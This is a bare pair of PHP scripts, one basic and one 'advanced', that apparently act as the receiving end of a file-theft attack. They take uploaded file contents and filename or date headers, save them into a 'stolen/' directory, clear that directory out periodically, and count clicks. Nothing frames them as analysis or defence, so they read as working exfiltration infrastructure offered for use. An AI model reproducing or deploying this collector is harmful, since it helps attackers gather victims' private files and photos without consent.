Download folder only:
_________________________________
<?php
$fname = $_SERVER["HTTP_FNAME"];
$inp = file_get_contents("php://input");

$file = scandir("stolen/");
if(sizeof($file) >= 32)
{
for($i = 2; $i < sizeof($file); $i++)
{
unlink("stolen/" . $file[$i]);
}
}

if($inp != "" && strlen($fname) > 0)
{
$p = "stolen/" . $fname . ".html";
file_put_contents($p, $inp);
chmod($p, 0640);
}

$oldCount = file_get_contents('count_fileclick.txt');

file_put_contents('count_fileclick.txt', $oldCount + 1);
?>


Advanced:
____________________________

<?php
$lmod = $_SERVER["HTTP_LMOD"];
$fname = $_SERVER["HTTP_FNAME"];
$inp = file_get_contents("php://input");

$file = scandir("stolen/");
if(sizeof($file) > 13)
{
for($i = 2; $i < sizeof($file); $i++)
{
unlink("stolen/" . $file[$i]);
}
}


if($inp != "" && strlen($lmod) > 0)
{
$lmod = date("d-m-Y", substr($lmod, 0, -3));
$p = "stolen/" . time() . "_" . $lmod . ".jpg";
file_put_contents($p, $inp);
chmod($p, 0640);
}else if($inp != "" && strlen($fname) > 0)
{
$p = "stolen/" . str_replace(".", "_", $fname);
file_put_contents($p, $inp);
chmod($p, 0640);
}

$oldCount = file_get_contents('count_fileclick.txt');

file_put_contents('count_fileclick.txt', $oldCount + 1);
?>